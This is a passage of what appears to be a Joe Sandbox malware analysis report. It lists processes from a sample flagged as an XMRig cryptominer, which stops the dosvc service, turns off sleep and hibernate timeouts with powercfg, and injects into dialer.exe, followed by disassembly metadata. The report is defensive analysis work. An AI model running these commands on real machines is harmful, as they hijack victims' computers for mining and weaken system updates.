                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:53
                                                                        Start time:04:36:01
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\sc.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                                        Imagebase:0x7ff6c8170000
                                                                        File size:72'192 bytes
                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:54
                                                                        Start time:04:36:01
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:55
                                                                        Start time:04:36:01
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\powercfg.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                        Imagebase:0x7ff7cff10000
                                                                        File size:96'256 bytes
                                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:56
                                                                        Start time:04:36:01
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\powercfg.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                        Imagebase:0x7ff7cff10000
                                                                        File size:96'256 bytes
                                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:57
                                                                        Start time:04:36:01
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:58
                                                                        Start time:04:36:01
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\powercfg.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                        Imagebase:0x7ff7cff10000
                                                                        File size:96'256 bytes
                                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:59
                                                                        Start time:04:36:01
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:60
                                                                        Start time:04:36:01
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\powercfg.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                        Imagebase:0x7ff7cff10000
                                                                        File size:96'256 bytes
                                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:61
                                                                        Start time:04:36:01
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:62
                                                                        Start time:04:36:01
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\dialer.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\dialer.exe
                                                                        Imagebase:0x7ff7dc670000
                                                                        File size:39'936 bytes
                                                                        MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:63
                                                                        Start time:04:36:01
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:64
                                                                        Start time:04:36:01
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\dialer.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\dialer.exe
                                                                        Imagebase:0x7ff7dc670000
                                                                        File size:39'936 bytes
                                                                        MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:65
                                                                        Start time:04:36:02
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\dialer.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:dialer.exe
                                                                        Imagebase:0x7ff7dc670000
                                                                        File size:39'936 bytes
                                                                        MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000041.00000002.3278592017.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000041.00000002.3278592017.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:66
                                                                        Start time:04:36:02
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                                        Imagebase:0x7ff7e52b0000
                                                                        File size:55'320 bytes
                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:67
                                                                        Start time:04:36:02
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                                        Imagebase:0x7ff7e52b0000
                                                                        File size:55'320 bytes
                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:68
                                                                        Start time:04:36:02
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                        Imagebase:0x7ff7e52b0000
                                                                        File size:55'320 bytes
                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:69
                                                                        Start time:04:36:03
                                                                        Start date:10/01/2025
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                                        Imagebase:0x7ff7e52b0000
                                                                        File size:55'320 bytes
                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Disassembly

                                                                        Reset < >

                                                                          Execution Graph

                                                                          Execution Coverage:5%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:21.8%
                                                                          Total number of Nodes:174
                                                                          Total number of Limit Nodes:2
                                                                          execution_graph 1191 7ff7eb901ab3 1192 7ff7eb90199e 1191->1192 1192->1191 1193 7ff7eb901b36 1192->1193 1195 7ff7eb9019e9 VirtualProtect 1192->1195 1196 7ff7eb901a0f 1192->1196 1194 7ff7eb901ba0 4 API calls 1193->1194 1194->1196 1195->1192 1423 7ff7eb901a70 1424 7ff7eb90199e 1423->1424 1424->1423 1425 7ff7eb9019e9 VirtualProtect 1424->1425 1426 7ff7eb901a0f 1424->1426 1427 7ff7eb901b36 1424->1427 1425->1423 1425->1424 1428 7ff7eb901ba0 4 API calls 1427->1428 1428->1426 1429 7ff7eb90216f 1430 7ff7eb902185 1429->1430 1431 7ff7eb902178 InitializeCriticalSection 1429->1431 1431->1430 1432 7ff7eb90146d 1433 7ff7eb901394 2 API calls 1432->1433 1232 7ff7eb9065ec 1233 7ff7eb9066e6 wcslen 1232->1233 1234 7ff7eb9065f9 1232->1234 1281 7ff7eb90153f 1233->1281 1234->1233 1282 7ff7eb901394 2 API calls 1281->1282 1283 7ff7eb90154e 1282->1283 1284 7ff7eb901394 2 API calls 1283->1284 1436 7ff7eb901e65 1437 7ff7eb901e67 signal 1436->1437 1438 7ff7eb901e7c 1437->1438 1440 7ff7eb901e99 1437->1440 1439 7ff7eb901e82 signal 1438->1439 1438->1440 1439->1440 1291 7ff7eb9015e4 1292 7ff7eb901394 2 API calls 1291->1292 1293 7ff7eb9015f3 1292->1293 1294 7ff7eb9038e0 wcslen 1302 7ff7eb90157b 1294->1302 1303 7ff7eb901394 2 API calls 1302->1303 1338 7ff7eb902320 strlen 1339 7ff7eb902337 1338->1339 1197 7ff7eb90219e 1198 7ff7eb902272 1197->1198 1199 7ff7eb9021ab EnterCriticalSection 1197->1199 1200 7ff7eb902265 LeaveCriticalSection 1199->1200 1201 7ff7eb9021c8 1199->1201 1200->1198 1201->1200 1202 7ff7eb9021e9 TlsGetValue GetLastError 1201->1202 1202->1201 1158 7ff7eb9011d8 1159 7ff7eb9011fa 1158->1159 1160 7ff7eb901201 _initterm 1159->1160 1161 7ff7eb90121a 1159->1161 1160->1161 1171 7ff7eb901880 1161->1171 1163 7ff7eb901247 SetUnhandledExceptionFilter 1164 7ff7eb90126a 1163->1164 1165 7ff7eb90126f malloc 1164->1165 1166 7ff7eb90128b 1165->1166 1167 7ff7eb9012a0 strlen malloc memcpy 1166->1167 1167->1167 1168 7ff7eb9012d0 1167->1168 1169 7ff7eb90132d _cexit 1168->1169 1170 7ff7eb901338 1168->1170 1169->1170 1172 7ff7eb9018a2 1171->1172 1177 7ff7eb901a0f 1171->1177 1173 7ff7eb901956 1172->1173 1176 7ff7eb90199e 1172->1176 1172->1177 1173->1176 1181 7ff7eb901ba0 1173->1181 1175 7ff7eb9019e9 VirtualProtect 1175->1176 1176->1175 1176->1177 1178 7ff7eb901b36 1176->1178 1177->1163 1179 7ff7eb901ba0 4 API calls 1178->1179 1180 7ff7eb901b53 1179->1180 1180->1177 1184 7ff7eb901bc2 1181->1184 1182 7ff7eb901c04 memcpy 1182->1173 1184->1182 1185 7ff7eb901c45 VirtualQuery 1184->1185 1186 7ff7eb901cf4 1184->1186 1185->1186 1190 7ff7eb901c72 1185->1190 1187 7ff7eb901d23 GetLastError 1186->1187 1188 7ff7eb901d37 1187->1188 1189 7ff7eb901ca4 VirtualProtect 1189->1182 1189->1187 1190->1182 1190->1189 1203 7ff7eb9014d6 1205 7ff7eb901394 1203->1205 1206 7ff7eb909a50 malloc 1205->1206 1207 7ff7eb9013b8 1206->1207 1208 7ff7eb9013c6 NtSetSystemPowerState 1207->1208 1148 7ff7eb901394 1152 7ff7eb909a50 1148->1152 1150 7ff7eb9013b8 1151 7ff7eb9013c6 NtSetSystemPowerState 1150->1151 1153 7ff7eb909a6e 1152->1153 1156 7ff7eb909a9b 1152->1156 1153->1150 1154 7ff7eb909b43 1155 7ff7eb909b5f malloc 1154->1155 1157 7ff7eb909b80 1155->1157 1156->1153 1156->1154 1157->1153 1340 7ff7eb903352 1345 7ff7eb9033b7 1340->1345 1341 7ff7eb903579 1342 7ff7eb90362b wcscpy wcscat wcslen 1341->1342 1343 7ff7eb901422 2 API calls 1342->1343 1346 7ff7eb903728 1343->1346 1344 7ff7eb903493 wcscpy wcscat wcslen 1353 7ff7eb901422 1344->1353 1345->1341 1345->1344 1355 7ff7eb90145e 1345->1355 1347 7ff7eb903767 1346->1347 1357 7ff7eb901431 1346->1357 1354 7ff7eb901394 2 API calls 1353->1354 1356 7ff7eb901394 2 API calls 1355->1356 1358 7ff7eb901394 2 API calls 1357->1358 1215 7ff7eb901fd0 1216 7ff7eb902033 1215->1216 1217 7ff7eb901fe4 1215->1217 1217->1216 1218 7ff7eb901ffd EnterCriticalSection LeaveCriticalSection 1217->1218 1218->1216 1304 7ff7eb901e10 1305 7ff7eb901e2f 1304->1305 1306 7ff7eb901e55 1305->1306 1307 7ff7eb901ecc 1305->1307 1310 7ff7eb901eb5 1305->1310 1306->1310 1312 7ff7eb901f12 signal 1306->1312 1308 7ff7eb901ed3 signal 1307->1308 1307->1310 1309 7ff7eb901ee4 1308->1309 1308->1310 1309->1310 1311 7ff7eb901eea signal 1309->1311 1311->1310 1312->1310 1359 7ff7eb902050 1360 7ff7eb9020cf 1359->1360 1361 7ff7eb90205e EnterCriticalSection 1359->1361 1362 7ff7eb9020c2 LeaveCriticalSection 1361->1362 1363 7ff7eb902079 1361->1363 1362->1360 1363->1362 1441 7ff7eb90118b 1442 7ff7eb901190 1441->1442 1443 7ff7eb9011b9 _amsg_exit 1441->1443 1442->1443 1444 7ff7eb9011a0 Sleep 1442->1444 1446 7ff7eb9011fa 1443->1446 1444->1442 1444->1443 1447 7ff7eb901201 _initterm 1446->1447 1448 7ff7eb90121a 1446->1448 1447->1448 1449 7ff7eb901880 5 API calls 1448->1449 1450 7ff7eb901247 SetUnhandledExceptionFilter 1449->1450 1451 7ff7eb90126a 1450->1451 1452 7ff7eb90126f malloc 1451->1452 1453 7ff7eb90128b 1452->1453 1454 7ff7eb9012a0 strlen malloc memcpy 1453->1454 1454->1454 1455 7ff7eb9012d0 1454->1455 1456 7ff7eb90132d _cexit 1455->1456 1457 7ff7eb901338 1455->1457 1456->1457 1364 7ff7eb901f47 1365 7ff7eb901e67 signal 1364->1365 1367 7ff7eb901e99 1364->1367 1366 7ff7eb901e7c 1365->1366 1365->1367 1366->1367 1368 7ff7eb901e82 signal 1366->1368 1368->1367 1313 7ff7eb902104 1314 7ff7eb902111 EnterCriticalSection 1313->1314 1319 7ff7eb902218 1313->1319 1315 7ff7eb90220b LeaveCriticalSection 1314->1315 1320 7ff7eb90212e 1314->1320 1315->1319 1316 7ff7eb902272 1317 7ff7eb902241 DeleteCriticalSection 1317->1316 1318 7ff7eb90214d TlsGetValue GetLastError 1318->1320 1319->1316 1319->1317 1320->1315 1320->1318 1321 7ff7eb901404 1322 7ff7eb901394 2 API calls 1321->1322 1323 7ff7eb901413 1322->1323 1324 7ff7eb901394 2 API calls 1323->1324 1226 7ff7eb901ac3 1227 7ff7eb90199e 1226->1227 1228 7ff7eb901b36 1227->1228 1230 7ff7eb9019e9 VirtualProtect 1227->1230 1231 7ff7eb901a0f 1227->1231 1229 7ff7eb901ba0 4 API calls 1228->1229 1229->1231 1230->1227 1325 7ff7eb901800 1326 7ff7eb901812 1325->1326 1327 7ff7eb901835 fprintf 1326->1327 1328 7ff7eb901000 1329 7ff7eb901040 1328->1329 1330 7ff7eb90108b __set_app_type 1328->1330 1329->1330 1331 7ff7eb9010b6 1330->1331 1332 7ff7eb9010e5 1331->1332 1334 7ff7eb901e00 1331->1334 1335 7ff7eb909fe0 __setusermatherr 1334->1335 1373 7ff7eb90653c 1376 7ff7eb902df0 1373->1376 1377 7ff7eb902e00 1376->1377 1386 7ff7eb902690 1377->1386 1421 7ff7eb90155d 1386->1421 1422 7ff7eb901394 2 API calls 1421->1422

                                                                          Executed Functions

                                                                          Function 00007FF7EB90118B Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 108sleepstringCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2070327807.00007FF7EB901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EB900000, based on PE: true
                                                                          • Associated: 00000000.00000002.2070271600.00007FF7EB900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2070380475.00007FF7EB90B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2070422051.00007FF7EB90E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2070466176.00007FF7EB90F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2071523893.00007FF7EBB8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2071609340.00007FF7EBBC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2071651119.00007FF7EBBC5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7eb900000_nW2oopMIdg.jbxd
                                                                          Similarity
                                                                          • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                          • String ID: Hc=v+$&
                                                                          • API String ID: 2643109117-1582277970
                                                                          • Opcode ID: f28bcbd3aced9bded85194f04272e05ae1a5f6cd8d3217fde42567944beb1297
                                                                          • Instruction ID: b2a94d7747a335c025be608e53e8545787abd3978ed2ead544d536688e354d96
                                                                          • Opcode Fuzzy Hash: f28bcbd3aced9bded85194f04272e05ae1a5f6cd8d3217fde42567944beb1297
                                                                          • Instruction Fuzzy Hash: 01411931A09616C5F644BB1DE990379ABA5BF45788FD48433EA4D837B6DF3CA8418322
                                                                          Function 00007FF7EB901394 Relevance: 1.5, APIs: 1, Instructions: 24nativeshutdownCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • NtSetSystemPowerState.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7EB901156), ref: 00007FF7EB9013F7
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2070327807.00007FF7EB901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EB900000, based on PE: true
                                                                          • Associated: 00000000.00000002.2070271600.00007FF7EB900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2070380475.00007FF7EB90B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2070422051.00007FF7EB90E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2070466176.00007FF7EB90F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2071523893.00007FF7EBB8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2071609340.00007FF7EBBC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2071651119.00007FF7EBBC5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7eb900000_nW2oopMIdg.jbxd
                                                                          Similarity
                                                                          • API ID: PowerStateSystem
                                                                          • String ID:
                                                                          • API String ID: 3171559674-0
                                                                          • Opcode ID: a1de17929970613745475dfb258eac20f00eeb650f4ca252eee93986af9b64e4
                                                                          • Instruction ID: 0e18025da4ab1a66d5b9328719b29663b717aa630856976929b35823c92f4430
                                                                          • Opcode Fuzzy Hash: a1de17929970613745475dfb258eac20f00eeb650f4ca252eee93986af9b64e4
                                                                          • Instruction Fuzzy Hash: 8AF0B671D0CB41C2E610EB69F84422ABB74FB8A388F405936EA9C46735CF3CE450CB61

                                                                          Non-executed Functions

                                                                          Function 00007FF7EB9065EC Relevance: 23.0, APIs: 12, Strings: 3, Instructions: 489COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 42 7ff7eb9065ec-7ff7eb9065f3 43 7ff7eb9066e6-7ff7eb906784 wcslen call 7ff7eb90153f call 7ff7eb90145e 42->43 44 7ff7eb9065f9-7ff7eb9066df 42->44 49 7ff7eb90680e-7ff7eb906822 43->49 50 7ff7eb90678a-7ff7eb906791 43->50 44->43 53 7ff7eb906824-7ff7eb906864 49->53 54 7ff7eb90686b-7ff7eb90688d wcslen 49->54 50->49 51 7ff7eb906793-7ff7eb906804 call 7ff7eb902f70 call 7ff7eb9039b0 call 7ff7eb9014c7 50->51 51->49 68 7ff7eb906806-7ff7eb906809 call 7ff7eb90145e 51->68 53->54 58 7ff7eb906890-7ff7eb9068a0 54->58 63 7ff7eb9068a6-7ff7eb9068ba wcslen 58->63 64 7ff7eb9069ac 58->64 63->58 66 7ff7eb9068bc 63->66 67 7ff7eb9069b0-7ff7eb9069c4 64->67 66->67 71 7ff7eb9069c6-7ff7eb906a22 67->71 72 7ff7eb906a29-7ff7eb906ae1 wcscpy wcscat call 7ff7eb902f70 call 7ff7eb903350 call 7ff7eb9014c7 67->72 68->49 71->72 81 7ff7eb907ec4-7ff7eb907f06 call 7ff7eb901370 72->81 82 7ff7eb906ae7-7ff7eb906aee 72->82 84 7ff7eb906af0-7ff7eb906b30 81->84 90 7ff7eb907f0c 81->90 82->84 85 7ff7eb906b37-7ff7eb906b47 wcslen 82->85 84->85 87 7ff7eb906b89-7ff7eb906b8b 85->87 88 7ff7eb906b49-7ff7eb906b55 85->88 89 7ff7eb906b91-7ff7eb906bbb wcscat 87->89 91 7ff7eb906b60-7ff7eb906b70 88->91 94 7ff7eb907f11-7ff7eb907f53 call 7ff7eb901370 89->94 95 7ff7eb906bc1-7ff7eb906bc8 89->95 90->85 96 7ff7eb906b72-7ff7eb906b85 wcslen 91->96 97 7ff7eb906b8d 91->97 99 7ff7eb906bca-7ff7eb906c0a 94->99 107 7ff7eb907f59 94->107 98 7ff7eb906c11-7ff7eb906c40 wcscpy wcscat 95->98 95->99 96->91 101 7ff7eb906b87 96->101 97->89 102 7ff7eb906c46-7ff7eb906c4d 98->102 103 7ff7eb907f5e-7ff7eb907f84 call 7ff7eb909840 call 7ff7eb901370 98->103 99->98 101->89 105 7ff7eb906d04-7ff7eb906d0b 102->105 106 7ff7eb906c53-7ff7eb906cfd 102->106 103->106 120 7ff7eb907f8a 103->120 109 7ff7eb906d11-7ff7eb906d18 105->109 110 7ff7eb907f8f-7ff7eb907fd3 call 7ff7eb901370 105->110 106->105 107->98 113 7ff7eb906d76-7ff7eb906d7d 109->113 114 7ff7eb906d1a-7ff7eb906d6f 109->114 110->114 121 7ff7eb907fd9 110->121 118 7ff7eb906d83-7ff7eb906d8a 113->118 119 7ff7eb907fde-7ff7eb908018 memcpy call 7ff7eb901370 113->119 114->113 123 7ff7eb906d90-7ff7eb906dac 118->123 124 7ff7eb906eed-7ff7eb906f8b wcslen call 7ff7eb90153f call 7ff7eb90145e 118->124 119->123 130 7ff7eb90801e 119->130 120->105 121->113 125 7ff7eb906db0-7ff7eb906e08 123->125 133 7ff7eb907021-7ff7eb907049 call 7ff7eb90145e 124->133 134 7ff7eb906f91-7ff7eb906f98 124->134 125->125 128 7ff7eb906e0a-7ff7eb906ee6 125->128 128->124 130->124 134->133 136 7ff7eb906f9e-7ff7eb907017 call 7ff7eb902f70 call 7ff7eb9039b0 call 7ff7eb9014c7 134->136 136->133 144 7ff7eb907019-7ff7eb90701c call 7ff7eb90145e 136->144 144->133
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2070327807.00007FF7EB901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EB900000, based on PE: true
                                                                          • Associated: 00000000.00000002.2070271600.00007FF7EB900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2070380475.00007FF7EB90B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2070422051.00007FF7EB90E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2070466176.00007FF7EB90F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2071523893.00007FF7EBB8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2071609340.00007FF7EBBC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2071651119.00007FF7EBBC5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7eb900000_nW2oopMIdg.jbxd
                                                                          Similarity
                                                                          • API ID: wcslen
                                                                          • String ID: 0$X&$ 6
                                                                          • API String ID: 4088430540-2247980209
                                                                          • Opcode ID: fefaa4b7e40953cfa417f533f7704ca4e73cf3ccdfab8b8a9cf10832c6394322
                                                                          • Instruction ID: 5890b5e6ca471a5720de02932ebcb1c393d1e1e32d963d67e20c429ac8c92db8
                                                                          • Opcode Fuzzy Hash: fefaa4b7e40953cfa417f533f7704ca4e73cf3ccdfab8b8a9cf10832c6394322
                                                                          • Instruction Fuzzy Hash: 28523861D2C68384F711EB2DA8513F8BA60BF95388FC45233D98C566B2EF7C6245C726
                                                                          Function 00007FF7EB9011D8 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78stringCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2070327807.00007FF7EB901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EB900000, based on PE: true
                                                                          • Associated: 00000000.00000002.2070271600.00007FF7EB900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2070380475.00007FF7EB90B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2070422051.00007FF7EB90E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2070466176.00007FF7EB90F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2071523893.00007FF7EBB8B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2071609340.00007FF7EBBC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2071651119.00007FF7EBBC5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7eb900000_nW2oopMIdg.jbxd
                                                                          Similarity
                                                                          • API ID: malloc$ExceptionFilterUnhandled_cexit_inittermmemcpystrlen
                                                                          • String ID: Hc=v+$&
                                                                          • API String ID: 3825114775-1582277970
                                                                          • Opcode ID: 2ec421b47950669208d24b2c07c5bdd3e08f0d0719c06cd5544466d22b6309cc
                                                                          • Instruction ID: b522a7f3e8f9e11f7fe25b418d69f583ddba5cfdf29fe9e1ab43c5b2b9e37d95
                                                                          • Opcode Fuzzy Hash: 2ec421b47950669208d24b2c07c5bdd3e08f0d0719c06cd5544466d22b6309cc
                                                                          • Instruction Fuzzy Hash: 32412631A19A12C5F600BB1DE990379BBA5BF45788FD44033EA8D837B6DF3CA4418322
                                                                          Function 00007FF7EB902690 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 322COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
